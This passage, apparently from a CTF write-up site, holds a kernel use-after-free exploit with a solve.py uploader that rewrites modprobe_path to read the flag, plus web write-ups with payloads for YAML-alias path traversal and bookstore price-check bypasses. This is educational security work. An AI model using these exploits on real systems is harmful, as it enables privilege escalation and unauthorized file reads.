(ioctl(dev_fd, CMD_FREE, 0) \u0026lt; 0) die(\u0026#34;free\u0026#34;); printf(\u0026#34;[+] UAF active\\n\u0026#34;); /* ---- PTE spray -\u0026gt; reclaim page as PMD page ---- */ for (int i = 0; i \u0026lt; SPRAY_COUNT; i++) { void *a = (void *)(SPRAY_BASE + (uint64_t)i * SPRAY_STRIDE); void *p = mmap(a, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0); if (p != MAP_FAILED) *(volatile uint64_t *)p = 0xCAFE0000ULL + i; } int count = 0; for (int i = 0; i \u0026lt; 512; i++) { uint64_t v = uaf[i]; if (v \u0026amp;\u0026amp; v != 0x4141414141414141ULL \u0026amp;\u0026amp; (v \u0026amp; PT_PRESENT) \u0026amp;\u0026amp; (v \u0026amp; PT_USER)) count++; } printf(\u0026#34;[+] %d/512 page table entries\\n\u0026#34;, count); if (count \u0026lt; 64) { printf(\u0026#34;[-] Retry\\n\u0026#34;); return 1; } /* ---- Identify virtual base ---- */ uint64_t virt_base = 0; uint64_t saved = uaf[0]; uaf[0] = PMD_HUGE; tlb_flush(); volatile uint64_t probe = *(volatile uint64_t *)SPRAY_BASE; uaf[0] = saved; tlb_flush(); if (probe != 0xCAFE0000ULL) { virt_base = SPRAY_BASE; } else { saved = uaf[0]; uaf[0] = PMD_HUGE; tlb_flush(); probe = *(volatile uint64_t *)(SPRAY_BASE + 512 * SPRAY_STRIDE); uaf[0] = saved; tlb_flush(); if (probe != (0xCAFE0000ULL + 512)) virt_base = SPRAY_BASE + 512 * SPRAY_STRIDE; } if (!virt_base) { printf(\u0026#34;[-] PMD identification failed\\n\u0026#34;); return 1; } printf(\u0026#34;[+] PMD base: 0x%lx\\n\u0026#34;, virt_base); /* ---- Scan physical memory ---- */ volatile char *window = (volatile char *)virt_base; printf(\u0026#34;[*] Scanning physical memory...\\n\u0026#34;); uint64_t mod_phys = 0; int found = 0; /* Fast scan: parallel PMD entries */ #define KNOWN_OFF 0x13f5c0 uint64_t saved_pmds[MAX_CHUNKS]; for (int chunk = 0; chunk \u0026lt; MAX_CHUNKS; chunk++) { saved_pmds[chunk] = uaf[chunk]; uaf[chunk] = ((uint64_t)chunk * PAGE_2M) | PMD_HUGE; } tlb_flush(); for (int chunk = 0; chunk \u0026lt; MAX_CHUNKS 
\u0026amp;\u0026amp; !found; chunk++) { volatile char *w = (volatile char *)(virt_base + (uint64_t)chunk * PAGE_2M); if (w[KNOWN_OFF] == \u0026#39;/\u0026#39; \u0026amp;\u0026amp; w[KNOWN_OFF+1] == \u0026#39;s\u0026#39; \u0026amp;\u0026amp; w[KNOWN_OFF+5] == \u0026#39;/\u0026#39; \u0026amp;\u0026amp; w[KNOWN_OFF+6] == \u0026#39;m\u0026#39;) { const char *ref = \u0026#34;/sbin/modprobe\u0026#34;; int ok = 1; for (int j = 0; j \u0026lt; 14 \u0026amp;\u0026amp; ok; j++) if (w[KNOWN_OFF + j] != ref[j]) ok = 0; if (ok) { mod_phys = (uint64_t)chunk * PAGE_2M + KNOWN_OFF; found = 1; } } } for (int chunk = 0; chunk \u0026lt; MAX_CHUNKS; chunk++) uaf[chunk] = saved_pmds[chunk]; tlb_flush(); /* Slow scan fallback */ if (!found) { printf(\u0026#34;[*] Fast scan missed, trying slow scan...\\n\u0026#34;); uint64_t saved_pmd = uaf[0]; for (int chunk = 0; chunk \u0026lt; MAX_CHUNKS \u0026amp;\u0026amp; !found; chunk++) { uint64_t phys = (uint64_t)chunk * PAGE_2M; uaf[0] = phys | PMD_HUGE; tlb_flush(); for (int off = 0; off \u0026lt;= (int)PAGE_2M - 15 \u0026amp;\u0026amp; !found; off += 8) { if (window[off] != \u0026#39;/\u0026#39;) continue; if (window[off+5] != \u0026#39;/\u0026#39; || window[off+6] != \u0026#39;m\u0026#39;) continue; const char *ref = \u0026#34;/sbin/modprobe\u0026#34;; int ok = 1; for (int j = 0; j \u0026lt; 14 \u0026amp;\u0026amp; ok; j++) if (window[off + j] != ref[j]) ok = 0; if (ok) { mod_phys = phys + off; found = 1; } } } uaf[0] = saved_pmd; tlb_flush(); } if (!found) { printf(\u0026#34;[-] Not found\\n\u0026#34;); return 1; } printf(\u0026#34;[+] modprobe_path @ phys 0x%lx\\n\u0026#34;, mod_phys); /* ---- Prepare payload ---- */ system(\u0026#34;echo \u0026#39;#!/bin/sh\\ncp /flag /tmp/flag\\nchmod 777 /tmp/flag\u0026#39;\u0026#34; \u0026#34; \u0026gt; /tmp/x \u0026amp;\u0026amp; chmod +x /tmp/x\u0026#34;); /* ---- Overwrite modprobe_path ---- */ uint64_t mod_chunk = (mod_phys / PAGE_2M) * PAGE_2M; int mod_off = mod_phys - mod_chunk; uaf[0] = mod_chunk 
| PMD_HUGE; tlb_flush(); volatile char *p = window + mod_off; p[0]=\u0026#39;/\u0026#39;; p[1]=\u0026#39;t\u0026#39;; p[2]=\u0026#39;m\u0026#39;; p[3]=\u0026#39;p\u0026#39;; p[4]=\u0026#39;/\u0026#39;; p[5]=\u0026#39;x\u0026#39;; p[6]=\u0026#39;\\0\u0026#39;; uaf[0] = saved_pmd; tlb_flush(); printf(\u0026#34;[+] modprobe_path -\u0026gt; /tmp/x\\n\u0026#34;); /* ---- Trigger ---- */ system(\u0026#34;echo -ne \u0026#39;\\\\xff\\\\xff\\\\xff\\\\xff\u0026#39; \u0026gt; /tmp/dummy\u0026#34; \u0026#34; \u0026amp;\u0026amp; chmod +x /tmp/dummy\u0026#34; \u0026#34; \u0026amp;\u0026amp; /tmp/dummy 2\u0026gt;/dev/null; true\u0026#34;); usleep(100000); printf(\u0026#34;\\n\u0026#34;); system(\u0026#34;cat /tmp/flag 2\u0026gt;/dev/null || echo \u0026#39;[-] no flag\u0026#39;\u0026#34;); return 0; } solve.py (remote) #!/usr/bin/env python3 from pwn import * import base64, gzip, sys, os context.log_level = \u0026#34;info\u0026#34; EXPLOIT = os.path.join(os.path.dirname(os.path.abspath(__file__)), \u0026#34;exploit\u0026#34;) def upload(r, local_path, remote_path): with open(local_path, \u0026#34;rb\u0026#34;) as f: data = f.read() compressed = gzip.compress(data, compresslevel=9) b64 = base64.b64encode(compressed).decode() log.info(f\u0026#34;Upload: {len(data)}B -\u0026gt; {len(compressed)}B gz -\u0026gt; {len(b64)}B b64\u0026#34;) chunk_size = 960 chunks = [b64[i:i+chunk_size] for i in range(0, len(b64), chunk_size)] log.info(f\u0026#34;Sending {len(chunks)} chunks...\u0026#34;) r.sendline(b\u0026#34;cat /dev/null \u0026gt; /tmp/b64\u0026#34;) sleep(0.1) for i, chunk in enumerate(chunks): r.sendline(f\u0026#34;echo -n \u0026#39;{chunk}\u0026#39;\u0026gt;\u0026gt;/tmp/b64\u0026#34;.encode()) sleep(0.005) if i % 100 == 0 and i \u0026gt; 0: r.sendline(b\u0026#34;echo SYNC\u0026#34;) try: r.recvuntil(b\u0026#34;SYNC\\n\u0026#34;, timeout=10) except: r.recvuntil(b\u0026#34;$ \u0026#34;, timeout=5) log.info(f\u0026#34; {i}/{len(chunks)}\u0026#34;) r.sendline(b\u0026#34;echo 
ALLDONE\u0026#34;) r.recvuntil(b\u0026#34;ALLDONE\u0026#34;, timeout=30) log.info(\u0026#34;All chunks sent\u0026#34;) r.sendline(b\u0026#34;base64 -d /tmp/b64 \u0026gt; /tmp/e.gz \u0026amp;\u0026amp; gzip -d /tmp/e.gz \u0026amp;\u0026amp; mv /tmp/e \u0026#34; + remote_path.encode() + b\u0026#34; \u0026amp;\u0026amp; chmod +x \u0026#34; + remote_path.encode() + b\u0026#34; \u0026amp;\u0026amp; echo DECOK || echo DECFAIL\u0026#34;) resp = r.recvuntil([b\u0026#34;DECOK\u0026#34;, b\u0026#34;DECFAIL\u0026#34;], timeout=20) if b\u0026#34;DECFAIL\u0026#34; in resp: log.error(\u0026#34;Decode failed!\u0026#34;) return False log.success(\u0026#34;Decode OK\u0026#34;) return True if not os.path.exists(EXPLOIT): log.error(\u0026#34;Compile first: musl-gcc -static -Os -s -o exploit exploit.c\u0026#34;) sys.exit(1) r = remote(\u0026#34;localhost\u0026#34;, 1337) log.info(\u0026#34;Waiting for shell...\u0026#34;) r.recvuntil(b\u0026#34;$ \u0026#34;, timeout=30) log.success(\u0026#34;Got shell\u0026#34;) r.sendline(b\u0026#34;echo READY\u0026#34;) r.recvuntil(b\u0026#34;READY\u0026#34;, timeout=10) if not upload(r, EXPLOIT, \u0026#34;/tmp/exploit\u0026#34;): r.close() sys.exit(1) log.info(\u0026#34;Running exploit...\u0026#34;) r.sendline(b\u0026#34;/tmp/exploit\u0026#34;) try: while True: data = r.recv(timeout=10) if not data: break sys.stdout.buffer.write(data) sys.stdout.buffer.flush() except EOFError: pass r.close() Flag # 0xfun{r34l_k3rn3l_h4ck3rs_d0nt_unzip} ","date":"14 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/0xfunctf-26/phantom/","section":"CTFs","summary":"Physical page UAF in a kernel module: reclaim the freed page as a PMD, forge 2MB huge page entries for arbitrary physical memory R/W, and overwrite modprobe_path to read the flag.","title":"Phantom","type":"ctfs"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/aliasing/","section":"Tags","summary":"","title":"Aliasing","type":"tags"},{"content":"They call 
me the blogler.\nA blogging platform built with Flask. Users register, write blog posts in Markdown, and edit their blog\u0026rsquo;s YAML configuration through a Monaco editor. The flag sits at /flag on the server.\nThe app has explicit path traversal protection. It checks for ../ in filenames, blocks absolute paths, and verifies that resolved paths stay inside the blogs directory. Breaking through requires finding a way to mutate a filename after validation has already passed.\nApplication overview # The app has two main features: uploading blog posts (Markdown files saved to disk) and editing a YAML config that controls how your blog is served.\nWhen you visit /blog/\u0026lt;username\u0026gt;, the server reads each blog entry\u0026rsquo;s name field and opens that file from the blogs directory:\n@app.get(\u0026#34;/blog/\u0026lt;string:username\u0026gt;\u0026#34;) def serve_blog(username): if username not in users: return \u0026#34;username does not exist\u0026#34;, 404 blogs = [ {\u0026#34;title\u0026#34;: blog[\u0026#34;title\u0026#34;], \u0026#34;content\u0026#34;: mistune.html((blog_path / blog[\u0026#34;name\u0026#34;]).read_text())} for blog in users[username][\u0026#34;blogs\u0026#34;] ] return render_template(\u0026#34;blog.html\u0026#34;, blogs=blogs, name=users[username][\u0026#34;user\u0026#34;][\u0026#34;name\u0026#34;]) If we can control blog[\u0026quot;name\u0026quot;] to be something like ../../flag, the server will read /flag instead of a file inside blogs/. 
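The danger of that join is easy to reproduce with pathlib; the blogs directory location below is an assumption, not taken from the deployment:

```python
from pathlib import Path

blog_path = Path("/app/blogs")  # assumed location of the blogs directory

# Joining an attacker-controlled name walks straight out of blogs/
p = (blog_path / "../../flag").resolve()
print(p)                             # /flag
print(p.is_relative_to(blog_path))   # False -- outside the blogs directory
```

`Path.__truediv__` does no sanitization at all; every `..` component survives the join and is only collapsed at `resolve()` time, which is exactly why the name field has to be validated separately.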
But there\u0026rsquo;s validation standing in the way.\nThe validation # When you submit a new YAML config, validate_conf checks every blog entry\u0026rsquo;s name field:\ndef validate_conf(old_cfg: dict, uploaded_conf: str) -\u0026gt; dict | str: try: conf = yaml.safe_load(uploaded_conf) for i, blog in enumerate(conf[\u0026#34;blogs\u0026#34;]): if not isinstance(blog.get(\u0026#34;title\u0026#34;), str): return f\u0026#34;please provide a \u0026#39;title\u0026#39; to the {i+1}th blog\u0026#34; # no lfi file_name = blog[\u0026#34;name\u0026#34;] assert isinstance(file_name, str) file_path = (blog_path / file_name).resolve() if \u0026#34;../\u0026#34; in file_name or file_name.startswith(\u0026#34;/\u0026#34;) or not file_path.is_relative_to(blog_path): return f\u0026#34;file path {file_name!r} is a hacking attempt. this incident will be reported\u0026#34; if not isinstance(conf.get(\u0026#34;user\u0026#34;), dict): conf[\u0026#34;user\u0026#34;] = dict() conf[\u0026#34;user\u0026#34;][\u0026#34;name\u0026#34;] = display_name(conf[\u0026#34;user\u0026#34;].get(\u0026#34;name\u0026#34;, old_cfg[\u0026#34;user\u0026#34;][\u0026#34;name\u0026#34;])) conf[\u0026#34;user\u0026#34;][\u0026#34;password\u0026#34;] = conf[\u0026#34;user\u0026#34;].get(\u0026#34;password\u0026#34;, old_cfg[\u0026#34;user\u0026#34;][\u0026#34;password\u0026#34;]) if not isinstance(conf[\u0026#34;user\u0026#34;][\u0026#34;password\u0026#34;], str): return \u0026#34;provide a valid password bro\u0026#34; return conf except Exception as e: return f\u0026#34;exception - {e}\u0026#34; Three checks block direct path traversal on each blog\u0026rsquo;s name:\n\u0026quot;../\u0026quot; in file_name rejects any filename containing the literal substring ../ file_name.startswith(\u0026quot;/\u0026quot;) rejects absolute paths not file_path.is_relative_to(blog_path) resolves the path and checks it stays under blogs/ These are solid. 
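Replaying the three conditions in isolation confirms they hold against a direct traversal string (the blogs path is again an assumed stand-in):

```python
from pathlib import Path

blog_path = Path("/app/blogs")  # assumed location

def name_allowed(file_name: str) -> bool:
    # The three checks from validate_conf, in the same order
    file_path = (blog_path / file_name).resolve()
    if "../" in file_name or file_name.startswith("/"):
        return False
    return file_path.is_relative_to(blog_path)

print(name_allowed("../../flag"))  # False: caught by the "../" substring check
print(name_allowed("/flag"))       # False: absolute path
print(name_allowed("post.md"))     # True: resolves inside blogs/
```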
There\u0026rsquo;s no way to pass a string like ../../flag through this gauntlet. But notice what happens after the loop: there\u0026rsquo;s a call to display_name() that modifies conf[\u0026quot;user\u0026quot;][\u0026quot;name\u0026quot;]. That\u0026rsquo;s the next piece of the puzzle.\nThe display_name function # def display_name(username: str) -\u0026gt; str: return \u0026#34;\u0026#34;.join(p.capitalize() for p in username.split(\u0026#34;_\u0026#34;)) This is meant to create a display-friendly version of a username. It splits on underscores, capitalizes each part, and joins them back together. For example:\nInput Split parts After capitalize Joined john_doe [\u0026quot;john\u0026quot;, \u0026quot;doe\u0026quot;] [\u0026quot;John\u0026quot;, \u0026quot;Doe\u0026quot;] JohnDoe hello_world [\u0026quot;hello\u0026quot;, \u0026quot;world\u0026quot;] [\u0026quot;Hello\u0026quot;, \u0026quot;World\u0026quot;] HelloWorld Seems harmless. But look at what happens with carefully chosen inputs:\nInput Split parts After capitalize Joined ._._ [\u0026quot;.\u0026quot;, \u0026quot;.\u0026quot;, \u0026quot;\u0026quot;] [\u0026quot;.\u0026quot;, \u0026quot;.\u0026quot;, \u0026quot;\u0026quot;] .. The string ._._ becomes .. after processing. The capitalize() call on . returns . (there\u0026rsquo;s nothing to capitalize), and the underscores disappear.\nThis means display_name can produce path traversal sequences from inputs that don\u0026rsquo;t contain ../.\nYAML anchors and aliases # Here\u0026rsquo;s the core trick. YAML supports anchors (\u0026amp;name) and aliases (*name), which create shared references to the same object. This is a feature for avoiding repetition in config files:\ndefaults: \u0026amp;defaults timeout: 30 retries: 3 server_a: \u0026lt;\u0026lt;: *defaults host: a.example.com server_b: \u0026lt;\u0026lt;: *defaults host: b.example.com The critical detail: anchors and aliases don\u0026rsquo;t create copies. 
They create references to the same object in memory. In Python terms, after yaml.safe_load:\ndata[\u0026#34;defaults\u0026#34;] is data[\u0026#34;server_a\u0026#34;] # same dict object This means mutating one mutates the other. And that\u0026rsquo;s the key to bypassing validation.\nPutting it together # The validation loop checks conf[\u0026quot;blogs\u0026quot;][0][\u0026quot;name\u0026quot;], and then later the code does:\nconf[\u0026#34;user\u0026#34;][\u0026#34;name\u0026#34;] = display_name(conf[\u0026#34;user\u0026#34;].get(\u0026#34;name\u0026#34;, ...)) If conf[\u0026quot;user\u0026quot;] and conf[\u0026quot;blogs\u0026quot;][0] are the same dict object (via a YAML alias), then writing to conf[\u0026quot;user\u0026quot;][\u0026quot;name\u0026quot;] also overwrites conf[\u0026quot;blogs\u0026quot;][0][\u0026quot;name\u0026quot;].\nThe attack config:\nblogs: - \u0026amp;ref title: \u0026#34;flag\u0026#34; name: \u0026#34;._._/._._/flag\u0026#34; user: *ref Here\u0026rsquo;s the step-by-step execution:\nYAML parsing: yaml.safe_load creates one dict {\u0026quot;title\u0026quot;: \u0026quot;flag\u0026quot;, \u0026quot;name\u0026quot;: \u0026quot;._._/._._/flag\u0026quot;}. Both blogs[0] and user point to this same dict.\nValidation loop: The code checks blogs[0][\u0026quot;name\u0026quot;] which is \u0026quot;._._/._._/flag\u0026quot;. This passes all three checks:\n\u0026quot;../\u0026quot; in \u0026quot;._._/._._/flag\u0026quot; → False (no ../ substring) \u0026quot;._._/._._/flag\u0026quot;.startswith(\u0026quot;/\u0026quot;) → False The resolved path stays under blog_path (since there\u0026rsquo;s no actual .. 
yet) The mutation: After the loop, the code runs:\nconf[\u0026#34;user\u0026#34;][\u0026#34;name\u0026#34;] = display_name(conf[\u0026#34;user\u0026#34;].get(\u0026#34;name\u0026#34;, ...)) conf[\u0026quot;user\u0026quot;] is the same dict as blogs[0], so conf[\u0026quot;user\u0026quot;].get(\u0026quot;name\u0026quot;) returns \u0026quot;._._/._._/flag\u0026quot;. Then display_name processes it:\ndisplay_name(\u0026#34;._._/._._/flag\u0026#34;) # split(\u0026#34;_\u0026#34;) → [\u0026#34;.\u0026#34;, \u0026#34;.\u0026#34;, \u0026#34;/.\u0026#34;, \u0026#34;.\u0026#34;, \u0026#34;/flag\u0026#34;] # capitalize each → [\u0026#34;.\u0026#34;, \u0026#34;.\u0026#34;, \u0026#34;/.\u0026#34;, \u0026#34;.\u0026#34;, \u0026#34;/flag\u0026#34;] # join → \u0026#34;../../flag\u0026#34; Why does capitalize() leave everything unchanged? It uppercases only the first character and lowercases the rest. The first character in each part is either . or /, and non-alphabetic characters have no uppercase form, so they pass through. The remaining letters (flag) are already lowercase, so lowercasing them is a no-op.\nThe concatenation builds up ../../flag piece by piece:\nThis overwrites blogs[0][\u0026quot;name\u0026quot;] to \u0026quot;../../flag\u0026quot;. Validation already passed, so it\u0026rsquo;s too late to catch it.\nReading the blog: When someone visits /blog/\u0026lt;username\u0026gt;, the server does:\n(blog_path / blog[\u0026#34;name\u0026#34;]).read_text() Which resolves blogs/../../flag → /flag, and we get the flag.\nExploit # Register an account with any username and password\nSubmit the malicious YAML config via the config editor:\nblogs: - \u0026amp;ref title: \u0026#34;flag\u0026#34; name: \u0026#34;._._/._._/flag\u0026#34; user: *ref Visit /blog/\u0026lt;your_username\u0026gt;. The server reads /flag and renders it as your blog post\nYou can do all of this through the web UI. 
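The whole chain fits in a few lines of plain Python; an ordinary shared dict reference stands in here for the YAML `&ref`/`*ref` alias:

```python
def display_name(username: str) -> str:
    return "".join(p.capitalize() for p in username.split("_"))

# One dict plays both roles -- exactly what the YAML anchor/alias produces
entry = {"title": "flag", "name": "._._/._._/flag"}
conf = {"blogs": [entry], "user": entry}

# Validation reads blogs[0]["name"] == "._._/._._/flag" and passes.
# The post-loop mutation then rewrites user["name"]:
conf["user"]["name"] = display_name(conf["user"]["name"])

print(conf["blogs"][0]["name"])  # ../../flag -- same object, so the check is stale
```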
Paste the YAML into the config editor on the left side, hit \u0026ldquo;Update Config\u0026rdquo;, then click the \u0026ldquo;blog\u0026rdquo; link to view your page.\nWhy the fix is hard # The root cause isn\u0026rsquo;t just the display_name function or the YAML aliases individually, it\u0026rsquo;s the combination. The code validates a data structure, then mutates part of it, not realizing that YAML aliasing has linked that part to something already validated.\nDefenses that would prevent this:\nDeep-copy the parsed YAML before processing, breaking shared references Validate after all mutations, not before Don\u0026rsquo;t mutate the config in-place, build a new dict for the validated output Flag # lactf{7m_g0nn4_bl0g_y0u} ","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/lactf-26/blogler/","section":"CTFs","summary":"YAML anchor aliasing creates a shared reference that bypasses path validation via display_name mutation.","title":"Blogler","type":"ctfs"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/bun/","section":"Tags","summary":"","title":"Bun","type":"tags"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/house-of-apple-2/","section":"Tags","summary":"","title":"House-of-Apple-2","type":"tags"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/javascript/","section":"Tags","summary":"","title":"Javascript","type":"tags"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/lactf-26/","section":"CTFs","summary":"","title":"LA CTF 2026","type":"ctfs"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/lfi/","section":"Tags","summary":"","title":"Lfi","type":"tags"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/libc-got/","section":"Tags","summary":"","title":"Libc-Got","type":"tags"},{"content":"I heard Amazon killed 
a certain book store so I\u0026rsquo;m gonna make my own book store and kill Amazon.\nI dove deep and delivered results.\nThe bobler\nTwo challenges, same bookstore. You start with $1000 and need to buy a flag that costs $1,000,000. The original \u0026ldquo;Narnes and Bobles\u0026rdquo; had a type confusion bug in a book price (string instead of number). The revenge \u0026ldquo;Bobles and Narnes\u0026rdquo; fixes that specific bug, but the same codebase has a second, subtler flaw: Bun SQL\u0026rsquo;s db() helper infers INSERT columns from the first object in a batch, silently dropping keys that only appear in later objects.\nThe application # The server is a Bun + Express bookstore backed by an in-memory SQLite database. Users register, get a $1000 balance, and can add books to their cart and check out. The checkout endpoint zips up the purchased files and sends them as a download.\nFour books are available:\nBook Price The Part-Time Parliament $10 The End of Cryptography $20 AVDestroyer Origin Lore $40 Flag $1,000,000 Each book has a \u0026ldquo;sample\u0026rdquo; variant (a preview file) and the full version. Sample items are free; full items cost their listed price.\nThe cart table stores items with three columns:\nCREATE TABLE cart_items ( username TEXT, book_id TEXT, is_sample INT, ... ); The price check # When adding products to the cart, /cart/add performs a balance check. 
This is the critical code path:\napp.post(\u0026#39;/cart/add\u0026#39;, needsAuth, async (req, res) =\u0026gt; { const productsToAdd = req.body.products; const [{ balance }] = await db`SELECT balance FROM users WHERE username=${res.locals.username}`; const [{ cartSum }] = await db` SELECT SUM(books.price) AS cartSum FROM cart_items JOIN books ON books.id = cart_items.book_id WHERE cart_items.username = ${res.locals.username} AND cart_items.is_sample = 0 `; const additionalSum = productsToAdd .filter((product) =\u0026gt; !+product.is_sample) .map((product) =\u0026gt; booksLookup.get(product.book_id).price ?? 99999999) .reduce((l, r) =\u0026gt; l + r, 0); if (additionalSum + cartSum \u0026gt; balance) { return res.json({ err: \u0026#39;too poor, have you considered geting more money?\u0026#39; }) } const cartEntries = productsToAdd.map((prod) =\u0026gt; ({ ...prod, username: res.locals.username })); await db`INSERT INTO cart_items ${db(cartEntries)}`; // ... }); The check works in two parts:\nSQL sum: tallies prices of non-sample items already in the cart (WHERE is_sample = 0) JS sum: tallies prices of non-sample items being added now (.filter((product) =\u0026gt; !+product.is_sample)) If the total exceeds the user\u0026rsquo;s balance, the request is rejected. Otherwise, the products are inserted into the database.\nHow checkout determines which file to serve # At checkout, the server reads each cart item and decides whether to serve the full file or the sample:\nconst path = item.is_sample ? book.file.replace(/\\.([^.]+)$/, \u0026#39;_sample.$1\u0026#39;) : book.file; const content = await Bun.file(\u0026#39;books/\u0026#39; + path).bytes(); If is_sample is truthy, you get flag_sample.txt. If falsy, you get flag.txt (the real flag). Importantly, checkout has no price validation. 
It just deducts from your balance (which can go negative) and serves the files.\nSo the goal is clear: get the flag book into your cart with is_sample stored as a falsy value in the database, while somehow passing the price check during add.\nThe original bug (narnes-and-bobles) # In the original challenge, the first book\u0026rsquo;s price in books.json was a string:\n{ \u0026#34;id\u0026#34;: \u0026#34;a3e33c2505a19d18\u0026#34;, \u0026#34;title\u0026#34;: \u0026#34;The Part-Time Parliament\u0026#34;, \u0026#34;price\u0026#34;: \u0026#34;10\u0026#34; } All other prices were numbers. This created a type confusion in the reduce operation.\nWhen you add both the Parliament book and the flag in one request, the reduce processes them left to right with initial value 0:\nStep 1: 0 + \u0026#34;10\u0026#34; = \u0026#34;010\u0026#34; (number + string = string concatenation!) Step 2: \u0026#34;010\u0026#34; + 1000000 = \u0026#34;0101000000\u0026#34; (still concatenating) Now additionalSum is the string \u0026quot;0101000000\u0026quot;. The balance check becomes:\n\u0026#34;0101000000\u0026#34; + null \u0026gt; 1000 // \u0026#34;0101000000null\u0026#34; \u0026gt; 1000 // NaN \u0026gt; 1000 // false \u0026lt;-- check passes! The string can\u0026rsquo;t be parsed as a number, so JavaScript coerces it to NaN. And NaN \u0026gt; anything is always false. 
The price check silently passes for any amount.\nSolve (narnes-and-bobles) # TARGET=\u0026#34;https://narnes-and-bobles-XXXXX.instancer.lac.tf\u0026#34; USER=\u0026#34;solve_$(date +%s)\u0026#34; curl -s -c /tmp/cookies.txt -X POST \u0026#34;$TARGET/register\u0026#34; \\ -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; \\ -d \u0026#34;username=${USER}\u0026amp;password=pass\u0026#34; # Parliament (string price) first, then flag -- order matters for reduce curl -s -b /tmp/cookies.txt -X POST \u0026#34;$TARGET/cart/add\u0026#34; \\ -H \u0026#34;Content-Type: application/json\u0026#34; \\ -d \u0026#39;{\u0026#34;products\u0026#34;: [{\u0026#34;book_id\u0026#34;: \u0026#34;a3e33c2505a19d18\u0026#34;, \u0026#34;is_sample\u0026#34;: 0}, {\u0026#34;book_id\u0026#34;: \u0026#34;2a16e349fb9045fa\u0026#34;, \u0026#34;is_sample\u0026#34;: 0}]}\u0026#39; curl -s -b /tmp/cookies.txt -X POST \u0026#34;$TARGET/cart/checkout\u0026#34; -o /tmp/solve.zip unzip -p /tmp/solve.zip flag.txt What the revenge changed # The fix is exactly one line. In books.json:\n- \u0026#34;price\u0026#34;: \u0026#34;10\u0026#34; + \u0026#34;price\u0026#34;: 10 The string price becomes a proper number. Now the reduce always produces a numeric sum, and the NaN trick no longer works. The flag\u0026rsquo;s price of 1,000,000 correctly exceeds the $1000 balance, and the check rejects it.\nEverything else in the codebase is identical (aside from some debug console.log statements).\nFinding the new bug # The insert at the end of /cart/add uses Bun SQL\u0026rsquo;s tagged template helper:\nconst cartEntries = productsToAdd.map((prod) =\u0026gt; ({ ...prod, username: res.locals.username })); await db`INSERT INTO cart_items ${db(cartEntries)}`; The db(cartEntries) call takes an array of objects and generates a batch INSERT statement. To do this, it needs to decide which columns to include. 
Bun\u0026rsquo;s implementation infers the column list from the keys of the first object in the array.\nThis means: if the first object is { book_id: \u0026quot;abc\u0026quot;, username: \u0026quot;me\u0026quot; } (no is_sample key), the generated SQL is:\nINSERT INTO cart_items (book_id, username) VALUES (?, ?), (?, ?) The is_sample column is simply absent from the INSERT. SQLite fills it with NULL for every row, regardless of whether later objects in the array had an is_sample property.\nBut here\u0026rsquo;s the critical part: the price check runs on the raw JavaScript objects from req.body.products, before the INSERT. The JS filter uses !+product.is_sample, which reads the is_sample property directly from each object.\nSo we have a mismatch:\nJS price check: sees the raw is_sample value from user input (per object) Database INSERT: only uses columns from the first object, dropping is_sample entirely if the first object doesn\u0026rsquo;t have it The exploit # Send two products in a single /cart/add request:\n{ \u0026#34;products\u0026#34;: [ { \u0026#34;book_id\u0026#34;: \u0026#34;a3e33c2505a19d18\u0026#34; }, { \u0026#34;book_id\u0026#34;: \u0026#34;2a16e349fb9045fa\u0026#34;, \u0026#34;is_sample\u0026#34;: 1 } ] } The first product (Parliament, $10) has no is_sample key. The second product (Flag) has is_sample: 1.\nWhat happens at add time (JS) # The filter .filter((product) =\u0026gt; !+product.is_sample) runs on each raw object:\nParliament: product.is_sample is undefined (key missing). +undefined = NaN. !NaN = true. Kept as non-sample. Price = $10. Flag: product.is_sample is 1. +1 = 1. !1 = false. Filtered out (treated as sample, not counted). additionalSum = 10. The balance check: 10 + null \u0026lt;= 1000. Passes.\nWhat happens at insert time (Bun SQL) # db() sees the first object\u0026rsquo;s keys: { book_id, username }. No is_sample. 
The INSERT becomes:\nINSERT INTO cart_items (book_id, username) VALUES (\u0026#39;a3e3...\u0026#39;, \u0026#39;me\u0026#39;), (\u0026#39;2a16...\u0026#39;, \u0026#39;me\u0026#39;) Both rows get is_sample = NULL.\nWhat happens at checkout # const path = item.is_sample ? book.file.replace(/\\.([^.]+)$/, \u0026#39;_sample.$1\u0026#39;) : book.file; item.is_sample is NULL, which JavaScript reads as null. null is falsy. The ternary takes the else branch: book.file = \u0026quot;flag.txt\u0026quot;. We get the full flag file.\nThe balance goes negative (1000 - 1000010 = -999010), but there\u0026rsquo;s no check preventing that at checkout.\nSolve (bobles-and-narnes) # TARGET=\u0026#34;https://bobles-and-narnes-XXXXX.instancer.lac.tf\u0026#34; USER=\u0026#34;solve_$(date +%s)\u0026#34; # Register curl -s -c /tmp/cookies.txt -X POST \u0026#34;$TARGET/register\u0026#34; \\ -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; \\ -d \u0026#34;username=${USER}\u0026amp;password=pass\u0026#34; # Add flag to cart (first product missing is_sample key) curl -s -b /tmp/cookies.txt -X POST \u0026#34;$TARGET/cart/add\u0026#34; \\ -H \u0026#34;Content-Type: application/json\u0026#34; \\ -d \u0026#39;{\u0026#34;products\u0026#34;: [{\u0026#34;book_id\u0026#34;: \u0026#34;a3e33c2505a19d18\u0026#34;}, {\u0026#34;book_id\u0026#34;: \u0026#34;2a16e349fb9045fa\u0026#34;, \u0026#34;is_sample\u0026#34;: 1}]}\u0026#39; # Checkout and extract flag curl -s -b /tmp/cookies.txt -X POST \u0026#34;$TARGET/cart/checkout\u0026#34; -o /tmp/solve.zip unzip -p /tmp/solve.zip flag.txt Flags # Narnes and Bobles:\nlactf{matcha_dubai_chocolate_labubu} Bobles and Narnes:\nlactf{hojicha_chocolate_dubai_labubu} ","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/lactf-26/narnes-bobles-and-bobles-narnes/","section":"CTFs","summary":"Two type confusion 